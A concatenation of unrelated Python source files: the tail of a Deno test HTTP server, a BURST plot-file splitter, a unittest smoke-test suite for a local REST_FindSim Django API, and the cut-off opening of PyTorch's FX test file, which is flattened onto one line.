        # can exercise media-type handling; otherwise defer to the default.
        if ".t1." in path:
            return "text/typescript"
        if ".t2." in path:
            return "video/vnd.dlna.mpeg-tts"
        if ".t3." in path:
            return "video/mp2t"
        if ".t4." in path:
            return "application/x-typescript"
        if ".j1." in path:
            return "text/javascript"
        if ".j2." in path:
            return "application/ecmascript"
        if ".j3." in path:
            return "text/ecmascript"
        if ".j4." in path:
            return "application/x-javascript"
        if "form_urlencoded" in path:
            return "application/x-www-form-urlencoded"
        if "no_ext" in path:
            return "text/typescript"
        if "unknown_ext" in path:
            return "text/typescript"
        if "mismatch_ext" in path:
            return "text/javascript"
        return SimpleHTTPServer.SimpleHTTPRequestHandler.guess_type(self, path)


def server():
    """Build (but do not start) the main static file server on PORT."""
    os.chdir(root_path)  # Hopefully the main thread doesn't also chdir.
    Handler = ContentTypeHandler
    Handler.extensions_map.update({
        ".ts": "application/typescript",
        ".js": "application/javascript",
        ".json": "application/json",
    })
    SocketServer.TCPServer.allow_reuse_address = True
    s = SocketServer.TCPServer(("", PORT), Handler)
    print "Deno test server http://localhost:%d/" % PORT
    return s


def redirect_server():
    """Build a server on REDIRECT_PORT that 301-redirects every GET to PORT."""
    os.chdir(root_path)
    target_host = "http://localhost:%d" % PORT

    class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
        def do_GET(self):
            self.send_response(301)
            self.send_header('Location', target_host + self.path)
            self.end_headers()

    Handler = RedirectHandler
    SocketServer.TCPServer.allow_reuse_address = True
    s = SocketServer.TCPServer(("", REDIRECT_PORT), Handler)
    print "redirect server http://localhost:%d/ -> http://localhost:%d/" % (
        REDIRECT_PORT, PORT)
    return s


def spawn():
    """Start both servers on daemon threads; returns the main server's thread."""
    # Main http server
    s = server()
    thread = Thread(target=s.serve_forever)
    thread.daemon = True
    thread.start()
    # Redirect server
    rs = redirect_server()
    r_thread = Thread(target=rs.serve_forever)
    r_thread.daemon = True
    r_thread.start()
    sleep(1)  # TODO I'm too lazy to figure out how to do this properly.
    return thread


def main():
    # Keep the process alive while the server thread runs; Ctrl-C exits.
    try:
        thread = spawn()
        while thread.is_alive():
            sleep(10)
    except KeyboardInterrupt:
        pass
    sys.exit(1)


if __name__ == '__main__':
    main()
plotSplitter.py
#!/usr/bin/python3
# BURST plot splitter: splits one optimized plot file into several smaller
# plots (or truncates it), streaming scoop-by-scoop through a bounded
# producer/consumer queue.

import os
import _thread
from util import Semaphore, diskFree, SCOOP_SIZE, NUM_SCOOPS, NONCE_SIZE

MAX_READ = 4 * NONCE_SIZE  # read granularity (bytes)
MB = 1024 * 1024


def readerThread(buf, sem, lock):
    """Producer: read the source plot scoop-by-scoop into `buf`.

    Relies on globals set by the __main__ block: nonces, stagger, inPathName,
    bStop, BRIGHTRED, RESET_ALL. `sem` bounds how far the reader may run
    ahead of the writer; `lock` is released to wake a writer that is blocked
    waiting for data. A trailing None in `buf` signals end-of-stream.
    """
    groupCnt = nonces // stagger
    groupSize = stagger * NONCE_SIZE
    groupScoopSize = stagger * SCOOP_SIZE
    try:
        with open(inPathName, "rb") as I:
            for scoop in range(NUM_SCOOPS):
                for group in range(groupCnt):
                    # Seek to this group's slice of the current scoop.
                    I.seek(group * groupSize + scoop * groupScoopSize)
                    reading = groupScoopSize
                    while reading > 0:
                        if bStop :
                            # Raising aborts the read cleanly via the handler below.
                            raise StopIteration("Cancelled by user")
                        buf.append(I.read(reading if reading < MAX_READ else MAX_READ))
                        if lock.locked():
                            lock.release()  # wake a writer blocked on empty buf
                        sem.acquire()  # block when too far ahead of the writer
                        reading -= MAX_READ
    except Exception as exc:
        print(BRIGHTRED + str(exc) + RESET_ALL)
    buf.append(None)  # end-of-stream sentinel
    if lock.locked() :
        lock.release()


if __name__ == "__main__":
    import sys
    import time
    from collections import deque
    from threading import Thread

    # Optional colored output; fall back to plain text without colorama.
    try:
        from colorama import init, Fore, Style
        BRIGHTRED = Style.BRIGHT + Fore.RED
        BRIGHTGREEN = Style.BRIGHT + Fore.GREEN
        BRIGHTBLUE = Style.BRIGHT + Fore.BLUE
        BRIGHTYELLOW = Style.BRIGHT + Fore.YELLOW
        RESET_ALL = Style.RESET_ALL
        init()
    except:
        BRIGHTRED = BRIGHTGREEN = BRIGHTBLUE = BRIGHTYELLOW = RESET_ALL = ""

    if len(sys.argv) < 2:
        print(BRIGHTGREEN + "BURST plot splitter (version 1.0)")
        print(BRIGHTBLUE + "Usage: %s [-r] [-t] [-d] [-s size] [-o OUTDIR] INPATH" % sys.argv[0])
        print("-r = Remove old files after successfull merge.")
        print("-d = Dry run.")
        print("-t = Truncate plot file instead of splitting it.")
        print("-s = Destination size.")
        print(BRIGHTGREEN + "If OUTDIR is missing then the optimized plot is written to the same directory "
              "as the source plot.")
        sys.exit(1)

    # Read arguments. "-o" and "-s" take a value in the *next* argv slot; the
    # sentinel trick (storing "-o"/"-s" into the target variable) marks that
    # the next iteration should consume the value.
    outDirName = None
    bTruncate = False
    bRemoveOld = False
    bDryRun = False
    inPathName = None
    inSize = 0
    splitNonces = None
    for arg in sys.argv[1:]:
        if arg == "-r":
            bRemoveOld = True
            continue
        if arg == "-t":
            bTruncate = True
            continue
        if arg == "-d":
            bDryRun = True
            continue
        if arg == "-o":
            outDirName = arg
            continue
        if outDirName == "-o":
            if not os.path.exists(arg):
                print(BRIGHTRED + f"Error: Output directory does not exist!" + RESET_ALL)
                sys.exit(1)
            outDirName = arg
            continue
        if arg == "-s":
            splitNonces = arg
            continue
        if splitNonces == "-s":
            # Size value: accept k/m/g/t suffixes (converted to nonces) or a
            # bare nonce count (for...else handles the no-suffix case).
            for c, m in ( ( "k", 1024 ), ( "m", MB ), ( "g", 1024 * MB ), ( "t", MB * MB ) ):
                if arg.endswith(c) or arg.endswith(c.upper()):
                    splitNonces = max(int(arg[:-1]) * m // NONCE_SIZE, 1)
                    break
            else:
                splitNonces = int(arg)
            continue
        # Anything else is (maybe) the source plot path; plot filenames have
        # the form key_startNonce_nonces_stagger with no extension.
        if not os.path.exists(arg):
            continue
        fileName = os.path.basename(arg)
        if "." in fileName or (fileName.count("_") != 3):
            continue
        try :
            key, startNonce, nonces, stagger = [ int(x) for x in fileName.split("_") ]
            inSize = os.path.getsize(arg)
            if nonces * NONCE_SIZE != inSize :
                print(BRIGHTRED + f"Error: Source file has invalid size! Expected {nonces * NONCE_SIZE} but file has {inSize}!" + RESET_ALL)
                sys.exit(1)
            inPathName = arg
        except Exception as exc :
            print(BRIGHTRED + f"Warning: Ignoring invalid source filename: {exc}" + RESET_ALL)
            sys.exit(1)

    if inPathName is None or not os.path.exists(inPathName):
        print(BRIGHTRED + f"Error: Source plot file is missing!" + RESET_ALL)
        sys.exit(1)
    if splitNonces >= nonces:
        print(BRIGHTRED + f"Error: Source plot file is smaller than split size!" + RESET_ALL)
        sys.exit(1)
    if outDirName in ( None, "-o" ):
        # No (or dangling) -o: write next to the source plot.
        outDirName = os.path.dirname(inPathName)

    # Plan the destination files: [path, file-handle, startNonce, nonces, bytes].
    # The last chunk is clamped to the remaining nonce count.
    outFiles = []
    curNonce = startNonce
    remNonces = nonces
    while remNonces > 0:
        outPathName = os.path.join(outDirName, f"{key}_{curNonce}_{splitNonces}_{splitNonces}")
        outFiles.append([ outPathName, None, curNonce, splitNonces, splitNonces * NONCE_SIZE ])
        curNonce += splitNonces
        remNonces -= splitNonces
        if remNonces < splitNonces:
            splitNonces = remNonces
        # In truncate mode only the first destination matters, so skip the
        # pre-existing-file cleanup for the rest.
        if bTruncate and len(outFiles):
            continue
        if os.path.exists(outPathName):
            print(BRIGHTRED + f"Warning: Destination file {outPathName} already exists! Removing it!" + RESET_ALL)
            if not bDryRun:
                os.remove(outPathName)

    if diskFree(outDirName) <= os.path.getsize(inPathName):
        print(BRIGHTRED + "Error: Not enough free space on disk for merged plot file!" + RESET_ALL)
        sys.exit(1)

    bStop = False
    if not bDryRun:
        # Start the producer with a bounded look-ahead of 1000 reads.
        buf = deque()
        sem = Semaphore(1000)
        lock = _thread.allocate_lock()
        thrReader = Thread(target = readerThread, args = ( buf, sem, lock ), daemon = True)
        thrReader.start()
    for nr, outFile in enumerate(outFiles):
        if bTruncate and nr:
            continue  # truncate mode keeps only the first destination
        outPathName, _, startNonce, splitNonces, outSize = outFile
        print(f"Destination file(s) {outPathName} will have:")
        print(f" Nonces: {splitNonces}")
        print(f" File size: {outSize // 1024 // MB} GB")
        # NOTE(review): this open() is not guarded by bDryRun, so a dry run
        # still creates empty destination files before exiting — confirm
        # whether that is intended.
        outFiles[nr][1] = open(outPathName, "wb")
    if bDryRun:
        sys.exit(0)

    # Writer loop: round-robin the incoming chunks across the destination
    # files, splitting any chunk that crosses a file boundary.
    t0 = time.time()
    curOutFileNr = 0
    O = outFiles[0][1]
    blockSize = outFiles[0][3] * SCOOP_SIZE  # bytes left in current file's scoop slice
    cnt = written = lastWritten = 0
    t1 = time.time()
    while thrReader.is_alive() or buf:
        try:
            data = buf.popleft()
            if data is None:
                break  # end-of-stream sentinel from the reader
            dataLen = len(data)
            if dataLen <= blockSize:
                # Chunk fits entirely in the current destination.
                if not O is None:
                    O.write(data)
                blockSize -= dataLen
            else:
                # Write the part that fits; blockSize goes negative and the
                # loop below spills the remainder into the next file(s).
                if not O is None:
                    O.write(data[:blockSize])
                blockSize -= dataLen
            while blockSize <= 0:
                curOutFileNr = (curOutFileNr + 1) % len(outFiles)
                O = outFiles[curOutFileNr][1]
                newBlockSize = outFiles[curOutFileNr][3] * SCOOP_SIZE
                if (blockSize < 0) and not O is None:
                    O.write(data[blockSize:dataLen + blockSize + newBlockSize])
                blockSize += newBlockSize
            sem.release()  # let the reader advance
            cnt += 1
            written += dataLen
            if cnt >= 1000:
                # Progress line roughly every 1000 chunks.
                t2 = time.time()
                print("%.1f%% written. %d MB/s. " % (100 * written / inSize, (written - lastWritten) // MB / (t2 - t1)), end = "\r")
                cnt = 0
                lastWritten = written
                t1 = t2
        except KeyboardInterrupt:
            bStop = True  # reader sees this and aborts
            buf.clear()
        except:
            # buf was empty (IndexError from popleft): block on the lock until
            # the reader releases it to signal new data.
            lock.acquire()

    for outFile in outFiles:
        # NOTE(review): `not outFile[1] and None` is always falsy, so the
        # destination files are never actually closed here — the condition
        # was almost certainly meant to be `outFile[1] is not None`.
        if not outFile[1] and None:
            outFile[1].close()
    if bStop:
        print(BRIGHTRED + "\nCancelled by user")
        sys.exit(1)
    if bRemoveOld:
        print(BRIGHTBLUE + "Removing old plot file...")
        try:
            os.remove(inPathName)
        except Exception as exc:
            # Windows file locking can make the removal fail even after all
            # handles appear to be closed.
            print(BRIGHTRED + f"Error: Failed removing plot file {inPathName}:\n{exc}" + RESET_ALL)
    print(BRIGHTGREEN + f"Finished after {int(time.time() - t0)} seconds.")
test.py
# REST_FindSim API smoke tests: posts tsv/model fixtures to a locally running
# Django server (URL_BASE) and asserts each response carries no error.
import unittest
import os
import subprocess
import signal
import multiprocessing
import time
import requests
import argparse

TSV_ZIP_PATH = 'test_files/test_opt.zip'
MODEL_DIR = 'test_files/model/'
TSV_DIR = 'test_files/tsv/'
URL_BASE = 'http://127.0.0.1:8000/'
OUTPUTRES = False  # print response objects (set via -or)
OUTPUTJSN = False  # print response JSON (set via -oj)


def http_request_optimization(n_p, trl, tsv_zip_path, model_path):
    """POST an Optimization task; returns the requests.Response.

    n_p: number of worker processes; trl: tolerance.
    NOTE(review): the two file handles opened here are never closed.
    """
    # 1.Set url and data:
    # url
    url = URL_BASE + 'tasks/Optimization/'
    # data
    data = {
        "username": "unittest",
        "num_processes": n_p,
        "tolerance": trl
    }
    # files
    files = {
        'tsv_files': open(tsv_zip_path, 'rb'),
        'model_file': open(model_path, 'rb')
    }
    # 2. Send REST request, get response
    response = requests.post(url, files=files, data=data)
    return response


def http_request_calculation(tsv_path, model_path):
    """POST a Calculation task; returns the requests.Response.

    NOTE(review): the two file handles opened here are never closed.
    """
    # 1.Set url and data:
    # url
    url = URL_BASE + 'tasks/Calculation/'
    # data
    data = {
        "username": "unittest",
    }
    # files
    files = {
        'tsv_file': open(tsv_path, 'rb'),
        'model_file': open(model_path, 'rb')
    }
    # 2. Send REST request, get response
    response = requests.post(url, files=files, data=data)
    return response


class TestEnv(unittest.TestCase):

    def test_findsim(self):
        '''
        Test FindSim exists
        '''
        path_parent = os.path.abspath('..')
        path_findsim = os.path.join(
            path_parent,'REST_FindSim/third_party/FindSim/findSim.py')
        path_optimization = os.path.join(
            path_parent,'REST_FindSim/third_party/FindSim/multi_param_minimization.py')
        self.assertTrue(os.path.isfile(path_findsim))
        self.assertTrue(os.path.isfile(path_optimization))


class TestAPIs(unittest.TestCase):

    def handle_response(self,r):
        # Optionally echo the response, then require an empty 'error' field.
        if OUTPUTRES:
            print(r)
        if OUTPUTJSN:
            print(r.json())
        self.assertEqual('', r.json()['error'])

    '''
    BarChart:
        bc_ratio_sb8.tsv    synSynth7.g
    DirectParameter:
        dp_Kd_tau.tsv       synSynth7.g
        dp.tsv              synSynth7.g
    DoseResponse:
        dr_j2c.tsv          synSynth7.g
        dr_ratio_b2c.tsv    synSynth7.g
    TimeSeries:
        iclamp_hh13.tsv     loadhh.py
        ts_j4d.tsv          synSynth7.g
        ts_norm_m3b.tsv     synSynth7.g
        ts_ratio_t2a.tsv    synSynth7.g
        vclamp_hh.tsv       loadhh.py
    '''

    def test_calculation_DP(self):
        """
        Test calculation. Type: DirectParameter
        """
        # dp_Kd_tau.tsv
        tsv = os.path.join(TSV_DIR, 'dp_Kd_tau.tsv')
        model = os.path.join(MODEL_DIR, 'synSynth7.g')
        r = http_request_calculation(tsv,model)
        self.handle_response(r)
        # dp.tsv
        tsv = os.path.join(TSV_DIR, 'dp.tsv')
        model = os.path.join(MODEL_DIR, 'synSynth7.g')
        r = http_request_calculation(tsv,model)
        self.handle_response(r)

    def test_calculation_BC(self):
        """
        Test calculation. Type: BarChart
        """
        # bc_ratio_sb8.tsv
        tsv = os.path.join(TSV_DIR, 'bc_ratio_sb8.tsv')
        model = os.path.join(MODEL_DIR, 'synSynth7.g')
        r = http_request_calculation(tsv,model)
        self.handle_response(r)

    def test_calculation_TS(self):
        """
        Test calculation. Type: TimeSeries
        """
        # iclamp_hh13.tsv
        tsv = os.path.join(TSV_DIR, 'iclamp_hh13.tsv')
        model = os.path.join(MODEL_DIR, 'loadhh.py')
        r = http_request_calculation(tsv,model)
        self.handle_response(r)
        # vclamp_hh.tsv
        tsv = os.path.join(TSV_DIR, 'vclamp_hh.tsv')
        model = os.path.join(MODEL_DIR, 'loadhh.py')
        r = http_request_calculation(tsv,model)
        self.handle_response(r)
        # ts_j4d.tsv
        tsv = os.path.join(TSV_DIR, 'ts_j4d.tsv')
        model = os.path.join(MODEL_DIR, 'synSynth7.g')
        r = http_request_calculation(tsv,model)
        self.handle_response(r)
        # ts_norm_m3b.tsv
        tsv = os.path.join(TSV_DIR, 'ts_norm_m3b.tsv')
        model = os.path.join(MODEL_DIR, 'synSynth7.g')
        r = http_request_calculation(tsv,model)
        self.handle_response(r)
        # ts_ratio_t2a.tsv
        tsv = os.path.join(TSV_DIR, 'ts_ratio_t2a.tsv')
        model = os.path.join(MODEL_DIR, 'synSynth7.g')
        r = http_request_calculation(tsv,model)
        self.handle_response(r)

    def test_calculation_DR(self):
        """
        Test calculation. Type: DoseResponse
        """
        # dr_j2c.tsv
        tsv = os.path.join(TSV_DIR, 'dr_j2c.tsv')
        model = os.path.join(MODEL_DIR, 'synSynth7.g')
        r = http_request_calculation(tsv,model)
        self.handle_response(r)
        # dr_ratio_b2c.tsv
        tsv = os.path.join(TSV_DIR, 'dr_ratio_b2c.tsv')
        model = os.path.join(MODEL_DIR, 'synSynth7.g')
        r = http_request_calculation(tsv,model)
        self.handle_response(r)

    def test_optimization_multi_process(self):
        """
        Test optimization request: multi processes (num_processes=6).
        (Docstring fixed: it previously said "single process".)
        """
        tsvs = TSV_ZIP_PATH
        model = os.path.join(MODEL_DIR, 'Gs_To_PKA_31_May_2019.g')
        r = http_request_optimization(6, 0.6, tsvs, model)
        self.handle_response(r)

    def test_optimization(self):
        """
        Test optimization request: single process (num_processes=1).
        (Docstring fixed: it previously said "multi processes".)
        """
        tsvs = TSV_ZIP_PATH
        model = os.path.join(MODEL_DIR, 'Gs_To_PKA_31_May_2019.g')
        r = http_request_optimization(1, 0.8, tsvs, model)
        self.handle_response(r)


def launch_API_server():
    """Run the Django dev server in a subprocess and block until it exits."""
    path_parent = os.path.abspath('..')
    path_APIs = os.path.join(path_parent, 'REST_FindSim/manage.py')
    command = 'python ' + path_APIs + ' runserver'
    p = subprocess.Popen(command,shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
    p.wait()


def main():
    """Parse CLI flags, assemble the selected test cases, and run them."""
    parser = argparse.ArgumentParser()
    # All
    parser.add_argument(
        '-a', '--All', action="store_true",
        help='Run all test cases.')
    # Optimization
    parser.add_argument(
        '-op', '--Optimization', action="store_true",
        help='Run optimization test cases.')
    # Calculation
    parser.add_argument(
        '-bc', '--BarChart', action="store_true",
        help='Run BarChart test cases.')
    parser.add_argument(
        '-dp', '--DirectParameter', action="store_true",
        help='Run DirectParameter test cases.')
    parser.add_argument(
        '-dr', '--DoseResponse', action="store_true",
        help='Run DoseResponse test cases.')
    parser.add_argument(
        '-ts', '--TimeSeries', action="store_true",
        help='Run TimeSeries test cases.')
    # Output
    parser.add_argument(
        '-or', '--OutputResponse', action="store_true",
        help='Output http response status when testing.')
    parser.add_argument(
        '-oj', '--OutputJson', action="store_true",
        help='Output http response content when testing.')
    parser.add_argument(
        '-v', '--Verbosity', type = int, default = 2,
        help='Set verbosity of unittest, default=2')
    args = parser.parse_args()

    global OUTPUTRES
    global OUTPUTJSN
    if args.OutputResponse:
        OUTPUTRES = True
    if args.OutputJson:
        OUTPUTJSN = True

    # TODO(Chen): Try to start server inside the test.py
    # 1.Launch server:
    '''
    print("---Launching server...")
    p_server = multiprocessing.Process(target =launch_API_server, args = ())
    p_server.start()
    '''

    # 2.Running tests:
    print("---Running tests...")
    suite = unittest.TestSuite()
    if args.All :
        tests = [TestEnv("test_findsim"),
                 # APIs' tests here
                 TestAPIs("test_calculation_BC"),
                 TestAPIs("test_calculation_DP"),
                 TestAPIs("test_calculation_DR"),
                 TestAPIs("test_calculation_TS"),
                 TestAPIs("test_optimization"),
                 TestAPIs("test_optimization_multi_process")]
    else:
        tests = [TestEnv("test_findsim")]
        if args.Optimization:
            tests.append(TestAPIs("test_optimization"))
            tests.append(TestAPIs("test_optimization_multi_process"))
        if args.BarChart:
            tests.append(TestAPIs("test_calculation_BC"))
        if args.DirectParameter:
            tests.append(TestAPIs("test_calculation_DP"))
        if args.DoseResponse:
            tests.append(TestAPIs("test_calculation_DR"))
        if args.TimeSeries:
            tests.append(TestAPIs("test_calculation_TS"))
    suite.addTests(tests)
    runner = unittest.TextTestRunner(verbosity=args.Verbosity)
    res = runner.run(suite)

    '''
    # 3.Terminate server
    print("---Terminating server...")
    os.killpg(os.getpgid(p_server.pid), signal.SIGTERM)
    # p_server.kill()
    print("---Finished.")
    '''


if __name__ == '__main__':
    main()
test_fx.py
# Owner(s): ["oncall: fx"] import builtins import contextlib import copy import functools import inspect import math import numbers import operator import os import pickle import sys import torch import traceback import typing import types import warnings import unittest from math import sqrt from torch.multiprocessing import Process from torch.testing import FileCheck from torch.testing._internal.common_methods_invocations import op_db from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests import torch.utils._pytree as pytree import torch.fx._pytree as fx_pytree from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH from torch.fx.node import Target, Argument from torch.fx.passes import shape_prop from torch.fx.immutable_collections import immutable_dict, immutable_list from torch.fx.experimental.rewriter import RewritingTracer from torch.fx.operator_schemas import get_signature_for_torch_op from copy import deepcopy from collections import namedtuple from torch.fx.proxy import TraceError from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401 from fx.test_dce_pass import TestDCE # noqa: F401 from fx.test_fx_const_fold import TestConstFold # noqa: F401 from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401 if sys.version_info >= (3, 7): from fx.test_gradual_type import AnnotationsTest # noqa: F401 if sys.version_info >= (3, 7): from fx.test_gradual_type import TypeCheckerTest # noqa: F401 from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union from torch.testing._internal.common_utils import ( IS_FBCODE, IS_MACOS, IS_WINDOWS, TEST_WITH_ROCM, find_library_location, run_tests, ) from torch.testing._internal.jit_utils import JitTestCase from fx.named_tup import MyNamedTup try: from torchvision import models 
as torchvision_models HAS_TORCHVISION = True except ImportError: HAS_TORCHVISION = False skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision") class SimpleTest(torch.nn.Module): def forward(self, x): return torch.relu(x + 3.0) def a_non_torch_leaf(a, b): return a + b # Used for test_autowrap_function. Autowrapped functions need to be global def fx_int(x: float) -> int: return int(x) def fx_int_x2(x: float) -> int: return int(x) * 2 # used in test_pytree. It's all the way out here because pickling a GraphModule # that uses Point errors out if Point is local to the function Point = namedtuple('Point', ['x', 'y']) # Test wrap() passing both a function name as well as a function # directly def a_lifted_leaf(a, b): return a[0] + a[1] + b wrap('a_lifted_leaf') # Test wrapping twice doesn't break anything wrap('a_lifted_leaf') def a_lifted_leaf2(a, b): return a[0] + a[1] + b wrap(a_lifted_leaf2) wrap('len') wrap('getattr') @wrap def wrapped_via_decorator(a): return a + 1 wrap('wrapped_with_submodule') def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d): return batchnorm1d(x) real_wrapped_via_decorator = wrapped_via_decorator real_a_lifed_leaf = a_lifted_leaf real_a_lifed_leaf2 = a_lifted_leaf2 _sqrt = sqrt wrap('wrapper_fn') def wrapper_fn(x): return torch.foo(x) class Pair(NamedTuple): x : torch.Tensor y : torch.Tensor # for testing pytrees class Foo(object): # noqa: B209 def __init__(self, a, b): self.a = a self.b = b class TestFX(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS): lib_file_path = find_library_location('libtorchbind_test.so') torch.ops.load_library(str(lib_file_path)) def tearDown(self): 
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None): """Check that an nn.Module's results match the GraphModule version for a given set of args/kwargs. """ kwargs = kwargs if kwargs else {} ref_outs = m(*args, **kwargs) gm = symbolic_trace(m) gm.graph.lint() test_outs = gm(*args, **kwargs) self.assertEqual(ref_outs, test_outs) def test_graph_module(self): class MySub(torch.nn.Module): def __init__(self): super().__init__() self.w = torch.nn.Parameter(torch.rand(4, 3)) def forward(self, x): return self.w + x class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.lin = torch.nn.Linear(4, 3) self.sub_mod = MySub() self.w = torch.nn.Parameter(torch.rand(3)) def forward(self, A, B, c): t = torch.sigmoid(A) + self.lin(c) return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3)) m = MyModule() gm = symbolic_trace(m) ms = torch.jit.script(gm) class M2(torch.nn.Module): def forward(self, A): m, idx = torch.max(A, 0) return m + 1, idx + 1 m2 = M2() gm2 = symbolic_trace(m2) class T(torch.nn.Module): def forward(self, A, b=4, *args, c=5, **kwargs): x = A + 1 + args[0] + kwargs['3'] return x t = T() symbolic_trace(t) # test for issue described at https://github.com/pytorch/pytorch/issues/63883 class M3(torch.nn.Module): def forward(self, x): return torch.relu(x) m3 = M3() gm3 = symbolic_trace(m3) new_instance = gm3.__new__(type(gm3)) new_instance.__init__(gm3, gm3.graph) x = torch.randn(5, 3) torch.testing.assert_allclose(new_instance(x), torch.relu(x)) def test_custom_import(self): graph = torch.fx.Graph() a = graph.placeholder('x') b = graph.placeholder('y') c = graph.call_function(a_non_torch_leaf, (a, b)) d = graph.call_function(torch.sin, (c,)) graph.output(d) gm = GraphModule(torch.nn.Module(), graph) x, y = torch.rand(1), torch.rand(1) self.assertEqual(torch.sin(x + y), gm(x, y)) def test_args_kwargs(self): class 
T(torch.nn.Module): def forward(self, *args, **kwargs): x = args[0] + kwargs['foo'] return x t = T() self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)}) def test_args_kwargs_no_self(self): class T(torch.nn.Module): def forward(*args, **kwargs): # noqa: B902 self = args[0] return torch.relu(args[1]) t = T() with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'): self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)}) def test_fx_shifts(self): class MyModule(torch.nn.Module): def forward(self, x): return x << 3, x >> 3 input = torch.LongTensor(10).random_(0, 1024) m = MyModule() self.checkGraphModule(m, (input,)) def test_fx_and_or(self): class MyModule(torch.nn.Module): def forward(self, x): return x & x, x | x input = torch.LongTensor(10).random_(0, 1024) m = MyModule() self.checkGraphModule(m, (input,)) def test_dict(self): class MyDictMod(torch.nn.Module): def forward(self, d): return d['3'].relu(), {'4' : d['3'].neg()} input_dict = {'3': torch.rand(3, 4)} m = MyDictMod() self.checkGraphModule(m, (input_dict,)) def test_matmul_tracing(self): const = torch.randn(3) def matmul_f(x): return x @ const mod = symbolic_trace(matmul_f) inp = torch.randn(3) self.assertEqual(mod(inp), matmul_f(inp)) def rmatmul_f(x): return const @ x mod = symbolic_trace(rmatmul_f) inp = torch.randn(3) self.assertEqual(mod(inp), rmatmul_f(inp)) def test_disallow_override(self): # Custom delegate to disallow in-place tensor operations class NoMutableCallTracer(Tracer): def create_node(self, kind : str, target : Union[str, Callable], args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None, type_expr : Optional[Any] = None) -> Node: name = target if isinstance(target, str) else torch.typename(target) if name[-1] == '_': raise RuntimeError('In-place operations are not supported') return super().create_node(kind, target, args, kwargs, name) # Test method class MyInplaceMod(torch.nn.Module): 
def forward(self, x): x.add_(3.0) return x m = MyInplaceMod() with self.assertRaisesRegex(RuntimeError, 'In-place operations'): NoMutableCallTracer().trace(m) # Test free function class MyInplaceMod2(torch.nn.Module): def forward(self, x): torch.log_(x) return x m2 = MyInplaceMod2() with self.assertRaisesRegex(RuntimeError, 'In-place operations'): NoMutableCallTracer().trace(m2) # Test symbolic node as an arg class MyInplaceMod3(torch.nn.Module): def forward(self, x): y = torch.ones(3, 4) y.add_(x) return x m3 = MyInplaceMod3() with self.assertRaisesRegex(RuntimeError, 'In-place operations'): NoMutableCallTracer().trace(m3) def test_leaf_module(self): # Custom delegate to make it so that there are no leaf modules, everything # should get traced through class NoLeafModulesTracer(Tracer): def is_leaf_module(self, m, qualname): return False class MyReluMod(torch.nn.Module): def __init__(self): super().__init__() self.relu = torch.nn.ReLU() def forward(self, x): return self.relu(x) mrm = MyReluMod() sym = NoLeafModulesTracer().trace(mrm) for node in sym.nodes: self.assertNotEqual(node.op, 'call_module') sym.lint() def test_wrap(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5)) def to_trace(y): return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y) m = symbolic_trace(to_trace) self.assertIn('a_lifted_leaf', m.code) self.assertEqual(27, m(2)) self.assertIs(a_lifted_leaf, real_a_lifed_leaf) def test_wrap_fn_directly(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5)) def to_trace(y): return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y) m = symbolic_trace(to_trace) self.assertIn('a_lifted_leaf2', m.code) self.assertEqual(27, m(2)) self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2) def test_wrapped_via_decorator(self): self.assertEqual(wrapped_via_decorator(0), 1) def to_trace(y): return wrapped_via_decorator(y) m = symbolic_trace(to_trace) self.assertIn('wrapped_via_decorator', m.code) 
self.assertEqual(m(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_wrapped_via_decorator_and_transformed(self): self.assertEqual(wrapped_via_decorator(0), 1) def to_trace(y): return wrapped_via_decorator(y) m = symbolic_trace(to_trace) self.assertIn('wrapped_via_decorator', m.code) self.assertEqual(m(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) transformed = torch.fx.Transformer(m).transform() self.assertIn('wrapped_via_decorator', transformed.code) self.assertEqual(transformed(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_wrap_with_submodule(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) def forward(self, x: torch.Tensor): return wrapped_with_submodule(x, self.batchnorm1d) m = symbolic_trace(M()) self.assertIn("wrapped_with_submodule", m.code) input = torch.rand(3, 2) ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) self.assertEqual(ref_batchnorm1d(input), m(input)) def test_wrapped_retrace(self): def to_trace(y): return wrapped_via_decorator(y) m = symbolic_trace(to_trace) self.assertIn('wrapped_via_decorator', m.code) self.assertEqual(m(0), 1) retraced = symbolic_trace(m) 